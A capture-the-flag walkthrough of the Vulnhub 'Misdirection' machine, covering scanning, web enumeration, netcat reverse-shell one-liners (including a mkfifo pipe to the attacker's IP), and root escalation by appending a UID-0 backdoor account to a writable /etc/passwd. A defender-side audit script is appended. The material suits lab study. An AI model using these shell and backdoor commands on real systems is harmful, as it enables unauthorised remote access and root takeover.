Misdirection: 1 Vulnhub Walkthrough

Misdirection is a vulnerable machine made by FalconSpy to help OSCP students strengthen and practice their skills for the exam.
We start by importing the VM into our virtualisation software and booting it. Leave it running untouched for now.

Network scanning and information gathering:
Back on our Kali machine, we run netdiscover to find the IP address of our target.

netdiscover 192.168.1.0/24

Now that we know the IP, we can use Nmap to scan for open ports and the services running on the target machine.

We see the following information, which can be of use to us:
1. Port 80: Rocket httpd
2. Port 22: OpenSSH 7.6
3. Port 3306: MySQL
4. Port 8080: Apache httpd

Enumeration:

Port 80 is open, so there should be a web page. Let's take a look.

There's not much here. The one thing of interest is the signup page, but that turned out to be just a "misdirection".
Port 8080 was also up, so let's try that too. It lands us on the Apache default page: another "misdirection".

Now we use Dirb to see if we can find anything else on these web servers.

The results are surprising. The following directories could be of interest:
1. ../debug/
2. ../shell/
3. ../wordpress/

While /wordpress/ and /shell/ turned out to be more "misdirection", /debug/ gave us a shell accessible through the browser.

Now let's get a netcat reverse shell.

First, start a netcat listener on your machine:

nc -lnvp 1234

Then, to get the reverse connection, run the following command in the debug page:

nc -e /bin/sh 192.168.1.13 1234

We see that the version of netcat on the target doesn't support the -e option, so we use the mkfifo method instead:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.13 1234 >/tmp/f

We now have a shell, as seen below.

Now, while exploring, I found that a folder named Brexit is in the home directory, which contains user.txt. This file is not accessible with the permissions we have as this user.

So let's try to switch user to brexit:

sudo -u Brexit /bin/bash

Now let’s see what we can do with this user.

We can now read user.txt.

Let's check the /etc folder. We find that the user Brexit has read and write permission on the passwd file.

Privilege Escalation:

We will exploit this by appending a new user with UID 0 (root privileges) to the file. First, create a password hash using openssl:

openssl passwd -1

Then append the entry, using the hash openssl printed, to /etc/passwd:

echo 'hacker:$1$VXadjjB/$bNNkCGCGJJG9gSF3AQqZm0:0:0::/root:/bin/bash' >> /etc/passwd

Now su to the user hacker and you will get root access.
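As an added defender-side check (not part of the original walkthrough), the following POSIX shell script audits a passwd-format file for the two conditions abused above: write permission for non-root users, and an extra UID-0 account whose hash sits directly in the password field. The sample file it builds is constructed, and the hash in it is a placeholder.

```shell
#!/bin/sh
# Audit a passwd-format file for the weakness abused above: a file that a
# non-root user can write, plus a second UID-0 account carrying an inline hash.
# The sample below is constructed; the hash value is a placeholder.

# Write a constructed passwd file mirroring the post-exploitation state
# (world-writable, with an appended "hacker" entry) and print its path.
make_sample() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
hacker:$1$saltsalt$PLACEHOLDERHASHPLACEHOLDER:0:0::/root:/bin/bash
EOF
    chmod 666 "$f"   # mimic the misconfigured mode found on the target
    printf '%s\n' "$f"
}

# Print one finding per line; exit status is 0 only when the file is clean.
audit_passwd() {
    f="$1"
    n=0
    # 1. Mode check: only root should be able to write the file (normally 0644).
    perms=$(ls -ld "$f" | cut -c1-10)
    case "$perms" in ?????w????) echo "PERM group-writable: $f"; n=$((n + 1)) ;; esac
    case "$perms" in ????????w?) echo "PERM world-writable: $f"; n=$((n + 1)) ;; esac
    # 2. Any name other than root with UID 0 is a backdoor root account.
    for u in $(awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$f"); do
        echo "UID0 extra root account: $u"; n=$((n + 1))
    done
    # 3. Field 2 should hold only a shadow marker (x, *, !); anything longer is a
    #    hash placed directly in passwd, which bypasses /etc/shadow entirely.
    for u in $(awk -F: 'length($2) > 1 { print $1 }' "$f"); do
        echo "HASH inline password hash: $u"; n=$((n + 1))
    done
    [ "$n" -eq 0 ]
}

# Demonstration on the constructed sample.
sample=$(make_sample)
audit_passwd "$sample" || echo "audit: findings present, investigate $sample"
rm -f "$sample"
```

Run it against the real file with `audit_passwd /etc/passwd` on a box you administer; a non-zero exit or any UID0/HASH line is worth an immediate look.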
